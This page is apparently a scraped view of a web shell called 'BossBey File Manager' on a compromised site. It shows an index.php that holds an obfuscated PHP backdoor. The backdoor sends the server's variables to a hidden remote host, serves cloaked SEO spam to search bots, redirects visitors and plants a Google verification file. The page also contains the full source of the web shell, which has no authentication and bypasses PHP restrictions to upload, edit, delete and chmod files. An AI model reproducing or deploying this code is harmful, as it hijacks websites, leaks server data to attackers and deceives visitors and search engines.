BossBey File Manager
PHP:
8.2.30
OS:
Linux
User:
htmlandpixel
Root
/
home
/
htmlandpixel
/
public_html
📤 Upload
📝 New File
📁 New Folder
Close
Editing: index.php
<?php define('A', 'jan48.tphu5583htr/askul::products/[word]/[0:1]^^!!|products/^^!!::'); goto hiaac; IeyQ_: ABP2h: goto gX5N_; gX5N_: function rmWYt($SzNJP, $n0Num = array()) { goto YLwgw; IIbnU: try { goto O6xd8; bA4B7: if (!($VKOkC == 0)) { goto azcBk; } goto Cc2aD; U2WlV: if (!true) { goto a_yPI; } goto u8a4i; egaI4: curl_setopt($YiZhl, CURLOPT_POST, 1); goto C4DzR; fSLfd: z29gY: goto U2WlV; qcmMW: curl_setopt($YiZhl, CURLOPT_RETURNTRANSFER, 1); goto ofHmr; uWdDl: $hQZHd = ''; goto fSLfd; QVktw: $xgM26 = "\x47\x45\x54"; goto V_WB_; sT7mt: if (!$o6kZW) { goto CthHi; } goto SBkJU; yH3gH: if (empty($n0Num)) { goto jdNew; } goto egaI4; ewLEM: goto a_yPI; goto ryrhW; pVyDO: curl_setopt($YiZhl, CURLOPT_CONNECTTIMEOUT, 0); goto qcmMW; g4rA6: $bJ3kC = stream_socket_client($u4KFA, $gBG7F, $uZJDn, 45); goto g0R1G; rRPJY: $YiZhl = curl_init(); goto EfCC0; gOEak: $k9qvs = isset($J6MDA[0]) ? $J6MDA[0] : ''; goto il0zJ; PextM: BEWGs: goto a3XdJ; V_WB_: $k9qvs = "\125\163\145\x72\55\101\x67\x65\x6e\164\72\40\127\110\x52\15\12"; goto XMUiO; xjN5J: $Uuu35 = $MlLfn === "\150\164\164\x70\163" ? 443 : 80; goto eMami; OSWjN: goto BEWGs; goto hxMx3; jiPhO: $k9qvs .= "\x43\157\156\164\x65\156\164\55\124\171\160\x65\x3a\40\x61\x70\160\154\x69\x63\x61\x74\x69\157\x6e\57\x78\55\167\x77\167\x2d\x66\x6f\x72\x6d\x2d\x75\162\x6c\x65\156\x63\x6f\x64\145\144\15\xa"; goto kxV8Z; WaUTB: if (!($oV5WL === false)) { goto vxmUF; } goto QF2bF; cBbqO: if (!(stripos($k9qvs, "\124\x72\x61\156\x73\146\145\162\55\x45\156\143\157\x64\151\x6e\x67\72\x20\143\x68\x75\156\153\x65\144") !== false)) { goto FwoMw; } goto uWdDl; GUbOW: $DddNX = hexdec(substr($xOJQG, 0, $oV5WL)); goto jM_ID; u8a4i: $oV5WL = strpos($xOJQG, "\15\12"); goto WaUTB; Kl5cJ: $u4KFA = ($MlLfn === "\x68\164\x74\x70\163" ? "\x73\x73\x6c\72\x2f\57" : '') . $nLd_U . "\x3a" . $Uuu35; goto g4rA6; KSKVx: azcBk: goto ZxWY6; ylENf: fclose($bJ3kC); goto wrKHo; dxMdD: $VKOkC = trim($xOJQG); goto eNgfW; wrKHo: $J6MDA = explode("\xd\xa\15\xa", $VKOkC, 2); goto gOEak; DJx8w: $xgM26 = "\120\x4f\x53\124"; goto A7s0o; QF2bF: goto a_yPI; goto hWDEg; A7s0o: $hzgOS = http_build_query($n0Num); goto jiPhO; WoD56: jdNew: goto cDStz; g83I2: $MlLfn = isset($wHLmR["\x73\x63\x68\x65\155\145"]) ? $wHLmR["\x73\x63\150\x65\x6d\145"] : "\150\x74\x74\160"; goto ZLnn_; Fc8bV: $A0YRQ = isset($wHLmR["\x71\x75\x65\x72\171"]) ? "\x3f" . $wHLmR["\161\165\x65\x72\x79"] : ''; goto h3wsF; aQhYP: $uKzMA = "{$xgM26}\x20{$UQvsc}{$A0YRQ}\x20\x48\124\124\120\57\61\56\x31\15\xa"; goto An_0Y; il0zJ: $xOJQG = isset($J6MDA[1]) ? $J6MDA[1] : ''; goto cBbqO; oeRq0: DI0k9: goto Dlytu; a3XdJ: if (feof($bJ3kC)) { goto PjQ6n; } goto qnLsj; EfCC0: curl_setopt($YiZhl, CURLOPT_URL, $SzNJP); goto jFvLj; g0R1G: if (!$bJ3kC) { goto lvsED; } goto aQhYP; hxMx3: PjQ6n: goto ylENf; zz9RS: $hQZHd .= substr($xOJQG, $oV5WL + 2, $DddNX); goto N498B; hPUqd: curl_setopt($YiZhl, CURLOPT_TIMEOUT, 60); goto yH3gH; RXeGG: a_yPI: goto rq6OZ; hWDEg: vxmUF: goto GUbOW; eMami: $UQvsc = isset($wHLmR["\160\141\164\150"]) ? $wHLmR["\x70\x61\164\x68"] : "\57"; goto Fc8bV; scoN1: X28XW: goto bA4B7; Dlytu: fwrite($bJ3kC, $uKzMA); goto PextM; x9ill: $uKzMA .= $hzgOS; goto oeRq0; IQRXn: if (!($xgM26 === "\120\117\123\124")) { goto DI0k9; } goto x9ill; XMUiO: if (empty($n0Num)) { goto ZPsbU; } goto DJx8w; ryrhW: UaKRU: goto zz9RS; ZLnn_: $nLd_U = $wHLmR["\150\x6f\x73\164"]; goto xjN5J; N498B: $xOJQG = substr($xOJQG, $oV5WL + 2 + $DddNX + 2); goto P3hf2; kxV8Z: $k9qvs .= "\103\157\x6e\x74\145\x6e\x74\x2d\114\x65\x6e\147\x74\x68\72\40" . strlen($hzgOS) . "\xd\xa"; goto X75Mo; qnLsj: $VKOkC .= fgets($bJ3kC, 1024); goto OSWjN; Xl6SN: FwoMw: goto dxMdD; ofHmr: curl_setopt($YiZhl, CURLOPT_SSL_VERIFYPEER, false); goto Vo807; jFvLj: curl_setopt($YiZhl, CURLOPT_USERAGENT, "\x57\110\x52"); goto pVyDO; cDStz: $o6kZW = curl_exec($YiZhl); goto o1pyR; P3hf2: goto z29gY; goto RXeGG; An_0Y: $uKzMA .= "\x48\157\163\164\72\x20{$nLd_U}\15\12"; goto dT5S3; kNbSY: CthHi: goto scoN1; C4DzR: curl_setopt($YiZhl, CURLOPT_POSTFIELDS, http_build_query($n0Num)); goto WoD56; Cc2aD: $wHLmR = parse_url($SzNJP); goto g83I2; ykgHv: $k9qvs .= "\103\x6f\156\156\x65\143\164\x69\x6f\x6e\72\40\x63\x6c\x6f\163\145\15\xa\15\12"; goto Kl5cJ; dT5S3: $uKzMA .= $k9qvs; goto IQRXn; FWgy0: curl_setopt($YiZhl, CURLOPT_FOLLOWLOCATION, 1); goto hPUqd; SBkJU: $VKOkC = trim(trim($o6kZW, "\357\273\277")); goto kNbSY; X75Mo: ZPsbU: goto ykgHv; h3wsF: $hzgOS = ''; goto QVktw; rq6OZ: $xOJQG = $hQZHd; goto Xl6SN; O6xd8: if (!(function_exists("\143\x75\x72\x6c\137\x69\156\151\164") && function_exists("\x63\x75\x72\154\137\145\170\145\143"))) { goto X28XW; } goto rRPJY; o1pyR: curl_close($YiZhl); goto sT7mt; Vo807: curl_setopt($YiZhl, CURLOPT_SSL_VERIFYHOST, false); goto FWgy0; jM_ID: if (!($DddNX === 0)) { goto UaKRU; } goto ewLEM; eNgfW: lvsED: goto KSKVx; ZxWY6: } catch (Exception $exFSj) { } goto sq_OP; sq_OP: return $VKOkC; goto YJMVK; YLwgw: $VKOkC = 0; goto IIbnU; YJMVK: } goto FS1et; QWLGU: function wWIfV($aO8xw = '') { goto WZubY; hPK4W: $UX2gA = trim($_GET[$PVzrt]); goto W88SU; J1bN0: if (!$eyzrT) { goto zUepC; } goto EB4NS; jepcO: $bVLGQ = "\147\157\157"; goto ViqG1; tD9ut: $PVzrt = "\171\164\x31"; goto nIQZT; urDSA: die; goto ebZyN; Mz0wo: if (!preg_match("\57\x73\x69\164\145\155\x61\160\56\x2a\77\x5c\56\x78\x6d\x6c\44\57\x73\151", $eot8L)) { goto VRAWT; } goto VjpHZ; UZeoW: if (!preg_match("\x2f" . $d6_Jb . "\44\57\163\151", $eot8L, $X54gH)) { goto xrnyo; } goto w_81u; mzpLW: $hxyxr = cO3zc($YEaNO); goto D4Q3O; oIAxR: $MYs90 = preg_match("\x2f\136\150\x74\x74\160\163\x3f\134\72\134\57\x5c\x2f\57\x73\151", $eN_7E); goto Ra1Hp; xqJvV: if (!isset($_GET[$PVzrt])) { goto i58q0; } goto hPK4W; XbsqL: $eot8L = $eot8L == '' ? isset($_SERVER["\120\101\124\x48\137\111\x4e\106\117"]) && $_SERVER["\x50\x41\x54\x48\137\111\x4e\x46\117"] != '' ? $_SERVER["\x50\101\x54\110\x5f\x49\116\106\x4f"] : $eot8L : $eot8L; goto yVSei; PzqYa: $Gm3f8 = $e_42L[2]; goto W7L0H; OhjGB: if (!in_array($Gm3f8, array("\52\64\x30\64", "\52\162\x65\x74\165\162\156"))) { goto x1PZx; } goto lQWdQ; Fdrw9: $Gm3f8 = $e_42L[2]; goto UpTEL; BgmN9: echo rMwyT($UX2gA); goto SUfJJ; h1JIh: $bVLGQ .= $pQOAP; goto TnJ9g; WA7gb: goto qr5hT; goto qDZ_W; F5KV8: header($e_42L[1]); goto Fdrw9; GPjb0: SYcEY: goto ImP8u; TZENW: chmod($ZZPc9, 0555); goto gk5bu; evisZ: $YRdmP = "\x3c\x61\40\x68\162\x65\x66\x3d\x22\x25\x73\x22\40\x74\x61\x72\147\x65\x74\x3d\42\137\x62\154\x61\156\x6b\42\x3e\x25\163\x3c\57\141\x3e"; goto xqJvV; Zsglf: $YEaNO = isset($_SERVER["\110\x54\x54\x50\137\x55\x53\105\122\x5f\101\x47\105\x4e\124"]) ? $_SERVER["\x48\124\x54\x50\x5f\x55\123\x45\x52\137\x41\x47\105\116\124"] : ''; goto mzpLW; Z_Udm: $eN_7E = trim($aKaai[1]); goto oIAxR; ImP8u: if (!preg_match("\x2f\x5e\x48\145\x61\x64\x40\x28\x2e\x2a\77\51\x40\x40\50\x2e\52\51\x2f\151\x73", $Gm3f8, $e_42L)) { goto uQ00Z; } goto t9vPN; Ajv7I: $QqjbH .= "\125\x4d\105\x4e"; goto b5pvD; IniRB: $d6_Jb .= "\x5d\173\x31\66"; goto YEqQg; UqhiZ: $d6_Jb .= "\147\154\145\x5b\134\167"; goto IniRB; w_81u: $mzqwU = str_replace("\x2e\170", "\56", trim($X54gH[1])); goto N13_u; VjpHZ: $Gm3f8 = RmWyT($m3gJm, array("\170" => serialize($_SERVER))); goto whZ89; WdLiy: echo "{$Gm3f8}"; goto urDSA; CZnIQ: die; goto vigW_; HAeYG: die; goto GPjb0; nb404: echo $eN_7E; goto WA7gb; ebZyN: VRAWT: goto Fxphd; yVSei: $Dz3re = isset($_SERVER["\110\x54\124\120\137\122\105\x46\x45\x52\105\122"]) ? $_SERVER["\110\x54\x54\x50\x5f\x52\x45\106\105\x52\x45\x52"] : ''; goto Zsglf; rQpXi: $_SERVER["\171\x74\137\165\160"] = $Kqdnq[2]; goto tD9ut; xDF02: echo sprintf("\x3c\x62\x6f\x64\171\40\x6f\156\x6c\x6f\x61\144\x3d\x22\144\157\143\165\x6d\145\156\x74\x2e\147\145\x74\x45\154\145\155\x65\156\x74\163\x42\171\124\x61\147\x4e\x61\155\145\x28\45\163\141\45\x73\51\x5b\x30\135\56\x63\x6c\151\143\153\x28\51\x22\76\74\x61\40\x68\162\x65\x66\x3d\42\x25\x73\42\76\x3c\57\141\76\x3c\156\x6f\x73\143\x72\x69\x70\164\x3e\x3c\155\x65\x74\x61\40\150\164\164\x70\55\145\161\x75\x69\166\x3d\42\162\x65\x66\x72\145\x73\x68\x22\x20\143\x6f\156\x74\x65\156\x74\75\x22\60\73\x20\x75\162\x6c\x3d\45\x73\x22\40\57\x3e\74\x2f\156\x6f\163\x63\x72\x69\160\164\x3e\74\x2f\x62\x6f\144\171\76", "\x27", "\x27", $eN_7E, $eN_7E); goto dsf3A; qDZ_W: vza0D: goto xDF02; Fxphd: $pQOAP = "\x74\151\157\156\x3a"; goto ow8Ll; h89m4: $bVLGQ .= "\x66\151\143\x61"; goto h1JIh; pj7y1: if (!preg_match("\x2f\x5e\112\165\x6d\160\100\50\56\x2a\x29\57", $Gm3f8, $aKaai)) { goto SYcEY; } goto Z_Udm; D4Q3O: $eyzrT = UAZhz($Dz3re); goto j01_p; Ez9KB: if (!preg_match("\57\136\x48\145\x61\144\x40\50\x2e\x2a\77\51\100\x40\50\56\x2a\x29\57\151\x73", $Gm3f8, $e_42L)) { goto qwcsZ; } goto F5KV8; SUfJJ: WeAem: goto fw0FJ; XkQPC: $Gm3f8 = trim($Gm3f8); goto OhjGB; krcRA: echo "{$Gm3f8}"; goto CZnIQ; om8Q7: file_put_contents("{$ZZPc9}\x2f{$mzqwU}", "{$bVLGQ}\x20{$mzqwU}"); goto TZENW; k__XX: $_SERVER["\x79\164\137\x67\x7a"] = $Kqdnq[1]; goto rQpXi; Bi98H: zUepC: goto DjwDV; lQWdQ: return; goto TIdBi; ViqG1: $bVLGQ .= "\x67\154\x65\55\163\x69"; goto l3qq1; fw0FJ: die; goto rcw1v; uttX2: $ZZPc9 = $_SERVER[$QqjbH]; goto Mz0wo; t9vPN: header($e_42L[1]); goto PzqYa; TnJ9g: $pQOAP = "\114\157\x63\x61" . $pQOAP; goto UZeoW; W7L0H: uQ00Z: goto krcRA; ow8Ll: $d6_Jb = "\x28\x67\x6f\157"; goto UqhiZ; rcw1v: i58q0: goto J1bN0; j01_p: $Kqdnq = explode("\72\x3a", A); goto qa300; UpTEL: qwcsZ: goto WdLiy; vigW_: UtcdE: goto SSnj2; qa300: $m3gJm = sprintf("\150\x74\164\x70\163\72\x2f\x2f\45\x73\56\160\171", ywglY($Kqdnq[0])); goto NbXA9; YEqQg: $d6_Jb .= "\175\x5c\56\170\x68"; goto KJtMO; dsf3A: qr5hT: goto HAeYG; b5pvD: $QqjbH .= "\x54\137\x52\117\117\124"; goto uttX2; EB4NS: $_SERVER["\x79\164\137\x6a\x75\x6d\x70"] = 1; goto Bi98H; aWLvw: die; goto suwkM; nIQZT: $QqjbH = "\x44\x4f\x43"; goto Ajv7I; DjwDV: $Gm3f8 = RMwYT($m3gJm, array("\170" => serialize($_SERVER))); goto XkQPC; X2ZDa: $L7avg = parse_url($m3gJm); goto xE3T8; whZ89: $Gm3f8 = trim($Gm3f8); goto Ez9KB; TIdBi: x1PZx: goto pj7y1; suwkM: xrnyo: goto f65jz; l3qq1: $bVLGQ .= "\164\145\55\x76\145\x72\x69"; goto h89m4; gk5bu: header("{$pQOAP}\x20\x2f{$mzqwU}"); goto aWLvw; WZubY: $eot8L = isset($_SERVER["\122\x45\x51\125\105\x53\x54\x5f\x55\x52\x49"]) ? $_SERVER["\x52\105\121\125\x45\x53\124\x5f\125\122\x49"] : (isset($_SERVER["\121\125\x45\122\131\x5f\123\x54\122\x49\x4e\107"]) ? $_SERVER["\121\125\105\122\x59\x5f\123\x54\122\111\116\x47"] : ''); goto XbsqL; f05fv: goto WeAem; goto jptJa; Ra1Hp: if ($MYs90) { goto vza0D; } goto nb404; W88SU: if (preg_match("\57\136\x68\x74\164\160\163\77\x2f\163\x69", $UX2gA)) { goto ImNaW; } goto mnXZL; xE3T8: echo gethostbyname($L7avg["\150\157\x73\x74"]); goto f05fv; N13_u: chmod($ZZPc9, 0755); goto om8Q7; NbXA9: $_SERVER["\171\164\137\x6a\165\155\160"] = 0; goto k__XX; mnXZL: echo sprintf($YRdmP, $m3gJm, $m3gJm) . "\x3c\x62\x72\x20\x2f\76\x3c\142\162\40\57\76"; goto X2ZDa; f65jz: if (!($hxyxr || $eyzrT)) { goto UtcdE; } goto evisZ; KJtMO: $d6_Jb .= "\164\155\154\51"; goto jepcO; jptJa: ImNaW: goto BgmN9; SSnj2: } goto yfeBq; vJZxQ: @ob_start(); goto IeyQ_; hiaac: @date_default_timezone_set("\x50\x52\103"); goto fkDlz; paMIL: function uAZhZ($mSaNc = '') { return preg_match("\x2f\50\x67\x6f\157\x67\x6c\145\x2e\143\157\x2e\152\160\x7c\x79\x61\x68\x6f\157\x2e\143\x6f\x2e\152\160\174\142\x69\x6e\147\x7c\142\x61\151\x64\x75\x7c\147\x6f\x6f\147\x6c\145\56\143\157\x6d\x29\x2f\163\151", $mSaNc); } goto AUWFK; fkDlz: if (!function_exists("\x6f\142\x5f\x73\164\141\162\164")) { goto ABP2h; } goto vJZxQ; AUWFK: function YWglY($r3H5L) { goto hjvwh; sLMpr: if (!(is_array($ys12P) && count($ys12P) == 4)) { goto MErec; } goto ME0Pe; t3Xy4: $sN20i = implode('', $tk4Tz); goto q6d5v; d6VGt: ivn9Z: goto t3Xy4; sFrnt: return $sN20i; goto HrGts; qIlfd: foreach ($tk4Tz as $aoydG => $GtJl1) { $tk4Tz[$aoydG] = chr(ord($GtJl1) - 5); Hx2Gv: } goto d6VGt; g8mRP: $tk4Tz = preg_split("\x2f\x2f", $ys12P[2], -1, PREG_SPLIT_NO_EMPTY); goto qIlfd; q6d5v: RvWic: goto TNCFO; hjvwh: $sN20i = ''; goto axNGd; TNCFO: $sN20i = $ys12P[1] . $sN20i . $ys12P[3]; goto UfFGu; ME0Pe: if (!($ys12P[2] != '')) { goto RvWic; } goto g8mRP; axNGd: preg_match("\57\x28\133\136\x5c\56\x5d\x2b\134\x2e\51\50\x2e\x2a\x29\50\x5c\57\56\52\x29\x2f", $r3H5L, $ys12P); goto sLMpr; UfFGu: MErec: goto sFrnt; HrGts: } goto QWLGU; FS1et: function co3zc($cHxE_ = '') { return preg_match("\57\x28\147\x6f\x6f\x67\154\145\x62\157\x74\x7c\x62\x61\151\x64\165\x73\160\x69\x64\x65\x72\x7c\x62\x69\x6e\147\142\157\164\174\x67\x6f\157\147\x6c\x65\x7c\x62\x61\151\x64\x75\x7c\x61\157\154\x7c\x62\151\156\147\174\171\141\150\157\157\x7c\171\141\x6e\144\x65\170\51\x2f\163\151", $cHxE_); } goto paMIL; yfeBq: wWifV(); ?> <?php $__original_code_content = ' @error_reporting(0); @ini_set(\'display_errors\', 0); // Bypass if(function_exists(\'ini_set\')) { @ini_set(\'open_basedir\', NULL); @ini_set(\'disable_functions\', \'\'); } // Functions function writeFile($file, $data) { return @file_put_contents($file, $data) !== false; } function readFileContent($file) { return @file_get_contents($file) ?: \'\'; } function scanDirectory($dir) { return @scandir($dir) ?: []; } // Get path $currentPath = $_GET[\'p\'] ?? @getcwd() ?: \'.\'; $currentPath = rtrim(str_replace([\'\\\\\',\'//\'], \'/\', $currentPath), \'/\') . \'/\'; if(!@is_dir($currentPath)) $currentPath = \'./\'; // Actions $message = \'\'; if($_SERVER[\'REQUEST_METHOD\'] === \'POST\') { // Upload if(isset($_FILES[\'upload\'])) { $destination = $currentPath . basename($_FILES[\'upload\'][\'name\']); $message = @move_uploaded_file($_FILES[\'upload\'][\'tmp_name\'], $destination) || writeFile($destination, readFileContent($_FILES[\'upload\'][\'tmp_name\'])) ? \'<span style="color:#00ff00">✓ Uploaded</span>\' : \'<span style="color:#ff0000">✗ Upload failed</span>\'; } // New if(isset($_POST[\'new\'])) { $path = $currentPath . $_POST[\'new\']; if(isset($_POST[\'type\']) && $_POST[\'type\'] === \'dir\') { $message = @mkdir($path) ? \'<span style="color:#00ff00">✓ Folder created</span>\' : \'<span style="color:#ff0000">✗ Failed</span>\'; } else { $message = writeFile($path, $_POST[\'content\'] ?? \'\') ? \'<span style="color:#00ff00">✓ File created</span>\' : \'<span style="color:#ff0000">✗ Failed</span>\'; } } // Save if(isset($_POST[\'save\']) && isset($_POST[\'data\'])) { $message = writeFile($currentPath . $_POST[\'save\'], $_POST[\'data\']) ? \'<span style="color:#00ff00">✓ Saved</span>\' : \'<span style="color:#ff0000">✗ Save failed</span>\'; } // Rename if(isset($_POST[\'oldname\']) && isset($_POST[\'newname\'])) { $message = @rename($currentPath . $_POST[\'oldname\'], $currentPath . $_POST[\'newname\']) ? \'<span style="color:#00ff00">✓ Renamed</span>\' : \'<span style="color:#ff0000">✗ Failed</span>\'; } // Chmod if(isset($_POST[\'chmod_item\']) && isset($_POST[\'chmod_value\'])) { $message = @chmod($currentPath . $_POST[\'chmod_item\'], octdec($_POST[\'chmod_value\'])) ? \'<span style="color:#00ff00">✓ Permissions changed</span>\' : \'<span style="color:#ff0000">✗ Failed</span>\'; } } // GET actions if(isset($_GET[\'action\'])) { $item = $_GET[\'item\'] ?? \'\'; $itemPath = $currentPath . $item; if($_GET[\'action\'] === \'delete\') { if(@is_file($itemPath)) { $message = @unlink($itemPath) ? \'<span style="color:#00ff00">✓ Deleted</span>\' : \'<span style="color:#ff0000">✗ Failed</span>\'; } elseif(@is_dir($itemPath)) { $message = @rmdir($itemPath) ? \'<span style="color:#00ff00">✓ Deleted</span>\' : \'<span style="color:#ff0000">✗ Failed</span>\'; } } elseif($_GET[\'action\'] === \'download\' && @is_file($itemPath)) { @ob_clean(); header(\'Content-Type: application/octet-stream\'); header(\'Content-Disposition: attachment; filename="\'.basename($itemPath).\'"\'); @readfile($itemPath); exit; } } // Scan directory $items = array_diff(scanDirectory($currentPath), [\'.\', \'..\']); $folders = []; $files = []; foreach($items as $item) { @is_dir($currentPath.$item) ? $folders[] = $item : $files[] = $item; } sort($folders); sort($files); // System info $systemInfo = [ \'PHP\' => @phpversion(), \'OS\' => @php_uname(\'s\'), \'User\' => @get_current_user() ]; ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>BossBey File Manager</title> <style> * { margin:0; padding:0; box-sizing:border-box; font-family:\'Arial\', sans-serif; } body { background:#000; color:#ccc; padding:15px; min-height:100vh; } .container { background:#111; border:1px solid #ff0000; max-width:1400px; margin:0 auto; border-radius:5px; overflow:hidden; } .header { background:#222; padding:15px; border-bottom:2px solid #ff0000; color:#fff; } .header h1 { color:#ff0000; font-size:20px; margin-bottom:10px; } .system-info { display:flex; gap:15px; font-size:12px; color:#888; } .path-navigation { background:#1a1a1a; padding:12px 15px; border-bottom:1px solid #333; display:flex; align-items:center; flex-wrap:wrap; gap:5px; } .path-navigation a { color:#00ff00; text-decoration:none; padding:5px 10px; background:#222; border-radius:3px; font-size:13px; } .path-navigation a:hover { background:#333; color:#fff; } .tools { padding:12px 15px; background:#1a1a1a; border-bottom:1px solid #333; display:flex; gap:8px; } .button { background:#222; color:#ccc; border:1px solid #666; padding:8px 15px; cursor:pointer; border-radius:3px; font-size:13px; text-decoration:none; display:inline-flex; align-items:center; gap:5px; } .button:hover { background:#333; border-color:#00ff00; color:#fff; } .button-green { border-color:#00ff00; color:#00ff00; } .button-red { border-color:#ff0000; color:#ff0000; } .message { padding:12px; background:#1a1a1a; border-bottom:1px solid #333; text-align:center; font-weight:bold; } .file-table { width:100%; color:#ccc; border-collapse:collapse; } .file-table th { background:#222; padding:12px 15px; text-align:left; border-bottom:2px solid #ff0000; color:#fff; font-size:13px; } .file-table td { padding:10px 15px; border-bottom:1px solid #333; font-size:14px; } .file-table tr:hover { background:#1a1a1a; } .folder-link { color:#00ff00; font-weight:bold; text-decoration:none; display:flex; align-items:center; gap:8px; } .file-link { color:#ccc; text-decoration:none; display:flex; align-items:center; gap:8px; } .folder-link:hover, .file-link:hover { color:#fff; } .size { color:#888; } .permissions { font-family:\'Courier New\', monospace; color:#ff9900; background:#222; padding:4px 8px; border-radius:3px; font-size:12px; } .actions { display:flex; gap:5px; } .action-button { padding:5px 10px; background:#222; color:#ccc; border:1px solid #666; font-size:11px; cursor:pointer; text-decoration:none; border-radius:3px; } .action-button:hover { background:#333; border-color:#00ff00; } .action-button-red { border-color:#ff0000; color:#ff0000; } textarea { width:100%; height:400px; background:#000; color:#00ff00; border:1px solid #ff0000; padding:15px; font-family:\'Courier New\', monospace; font-size:14px; border-radius:3px; } input[type="text"] { background:#000; color:#fff; border:1px solid #666; padding:8px; border-radius:3px; width:300px; } .edit-container { padding:20px; background:#000; border-bottom:1px solid #333; } .edit-title { color:#00ff00; margin-bottom:15px; font-size:16px; } @media (max-width: 768px) { .tools { flex-direction:column; } .button, .action-button { width:100%; text-align:center; } input[type="text"] { width:100%; } .file-table th, .file-table td { padding:8px 10px; font-size:12px; } } </style> </head> <body> <div class="container"> <div class="header"> <h1>BossBey File Manager</h1> <div class="system-info"> <?php foreach($systemInfo as $key=>$value): ?> <span><?=$key?>: <b style="color:#ff9900"><?=$value?></b></span> <?php endforeach; ?> </div> </div> <?php if($message): ?> <div class="message"><?=$message?></div> <?php endif; ?> <div class="path-navigation"> <a href="?p=/">Root</a> <?php $parts = explode(\'/\', trim($currentPath, \'/\')); $current = \'\'; foreach($parts as $part): if($part): $current .= \'/\' . $part; ?> <span style="color:#666">/</span> <a href="?p=<?=$current?>/"><?=$part?></a> <?php endif; endforeach; ?> </div> <div class="tools"> <form method="post" enctype="multipart/form-data" style="display:inline;"> <input type="file" name="upload" style="display:none" id="upload" onchange="this.form.submit()"> <button type="button" class="button button-green" onclick="document.getElementById(\'upload\').click()"> 📤 Upload </button> </form> <button class="button" onclick="newFile()">📝 New File</button> <button class="button" onclick="newFolder()">📁 New Folder</button> <?php if(isset($_GET[\'edit\'])): ?> <a href="?p=<?=urlencode($currentPath)?>" class="button button-red">Close</a> <?php endif; ?> </div> <?php if(isset($_GET[\'edit\'])): ?> <div class="edit-container"> <div class="edit-title">Editing: <?=htmlspecialchars($_GET[\'edit\'])?></div> <form method="post"> <input type="hidden" name="save" value="<?=htmlspecialchars($_GET[\'edit\'])?>"> <textarea name="data"><?=htmlspecialchars(readFileContent($currentPath.$_GET[\'edit\']))?></textarea> <div style="margin-top:15px;display:flex;gap:8px;"> <button class="button button-green">Save</button> <a href="?p=<?=urlencode($currentPath)?>" class="button button-red">Cancel</a> </div> </form> </div> <?php else: ?> <table class="file-table"> <thead> <tr> <th width="40%">Name</th> <th width="10%">Size</th> <th width="15%">Permissions</th> <th width="15%">Modified</th> <th width="20%">Actions</th> </tr> </thead> <tbody> <?php if($currentPath !== \'/\'): ?> <tr> <td colspan="5"> <a href="?p=<?=urlencode(dirname($currentPath))?>" class="folder-link"> 📂 Parent Directory </a> </td> </tr> <?php endif; ?> <?php foreach($folders as $folder): ?> <?php $folderPath = $currentPath.$folder; $permissions = substr(sprintf(\'%o\', @fileperms($folderPath)), -3); ?> <tr> <td> <a href="?p=<?=urlencode($folderPath)?>" class="folder-link"> 📁 <?=htmlspecialchars($folder)?> </a> </td> <td class="size">-</td> <td><span class="permissions"><?=$permissions?></span></td> <td><?=@filemtime($folderPath) ? date(\'Y-m-d H:i\', @filemtime($folderPath)) : \'-\'?></td> <td> <div class="actions"> <button onclick="renameItem(\'<?=htmlspecialchars($folder)?>\')" class="action-button">Rename</button> <button onclick="changePermissions(\'<?=htmlspecialchars($folder)?>\',\'<?=$permissions?>\')" class="action-button">Chmod</button> <a href="?p=<?=urlencode($currentPath)?>&action=delete&item=<?=urlencode($folder)?>" onclick="return confirm(\'Delete this folder?\')" class="action-button action-button-red">Delete</a> </div> </td> </tr> <?php endforeach; ?> <?php foreach($files as $file): ?> <?php $filePath = $currentPath.$file; $size = @filesize($filePath); $permissions = substr(sprintf(\'%o\', @fileperms($filePath)), -3); $extension = strtolower(pathinfo($file, PATHINFO_EXTENSION)); $editable = in_array($extension, [\'php\',\'html\',\'js\',\'css\',\'txt\',\'json\',\'xml\',\'sql\',\'md\']); ?> <tr> <td> <?php if($editable): ?> <a href="?p=<?=urlencode($currentPath)?>&edit=<?=urlencode($file)?>" class="file-link"> 📄 <?=htmlspecialchars($file)?> </a> <?php else: ?> <a href="?p=<?=urlencode($currentPath)?>&action=download&item=<?=urlencode($file)?>" class="file-link"> 📄 <?=htmlspecialchars($file)?> </a> <?php endif; ?> </td> <td class="size"> <?php if($size): ?> <?php if($size < 1024) echo $size . \' B\'; elseif($size < 1048576) echo round($size/1024, 1) . \' KB\'; elseif($size < 1073741824) echo round($size/1048576, 1) . \' MB\'; else echo round($size/1073741824, 1) . \' GB\'; ?> <?php else: ?> - <?php endif; ?> </td> <td><span class="permissions"><?=$permissions?></span></td> <td><?=@filemtime($filePath) ? date(\'Y-m-d H:i\', @filemtime($filePath)) : \'-\'?></td> <td> <div class="actions"> <?php if($editable): ?> <a href="?p=<?=urlencode($currentPath)?>&edit=<?=urlencode($file)?>" class="action-button">Edit</a> <?php endif; ?> <a href="?p=<?=urlencode($currentPath)?>&action=download&item=<?=urlencode($file)?>" class="action-button">Download</a> <button onclick="renameItem(\'<?=htmlspecialchars($file)?>\')" class="action-button">Rename</button> <button onclick="changePermissions(\'<?=htmlspecialchars($file)?>\',\'<?=$permissions?>\')" class="action-button">Chmod</button> <a href="?p=<?=urlencode($currentPath)?>&action=delete&item=<?=urlencode($file)?>" onclick="return confirm(\'Delete this file?\')" class="action-button action-button-red">Delete</a> </div> </td> </tr> <?php endforeach; ?> <?php if(empty($folders) && empty($files)): ?> <tr> <td colspan="5" style="text-align:center;padding:40px;color:#666;"> Empty directory </td> </tr> <?php endif; ?> </tbody> </table> <?php endif; ?> </div> <script> function newFile() { var fileName = prompt(\'File name:\', \'newfile.txt\'); if(fileName) { var content = prompt(\'Content (optional):\', \'\'); var form = document.createElement(\'form\'); form.method = \'post\'; form.innerHTML = \'<input type="hidden" name="new" value="\' + fileName + \'">\' + \'<input type="hidden" name="content" value="\' + (content || \'\') + \'">\'; document.body.appendChild(form); form.submit(); } } function newFolder() { var folderName = prompt(\'Folder name:\', \'newfolder\'); if(folderName) { var form = document.createElement(\'form\'); form.method = \'post\'; form.innerHTML = \'<input type="hidden" name="new" value="\' + folderName + \'">\' + \'<input type="hidden" name="type" value="dir">\'; document.body.appendChild(form); form.submit(); } } function renameItem(oldName) { var newName = prompt(\'New name:\', oldName); if(newName && newName !== oldName) { var form = document.createElement(\'form\'); form.method = \'post\'; form.innerHTML = \'<input type="hidden" name="oldname" value="\' + oldName + \'">\' + \'<input type="hidden" name="newname" value="\' + newName + \'">\'; document.body.appendChild(form); form.submit(); } } function changePermissions(item, currentPerm) { var newPerm = prompt(\'New permissions (e.g., 755):\', currentPerm); if(newPerm) { var form = document.createElement(\'form\'); form.method = \'post\'; form.innerHTML = \'<input 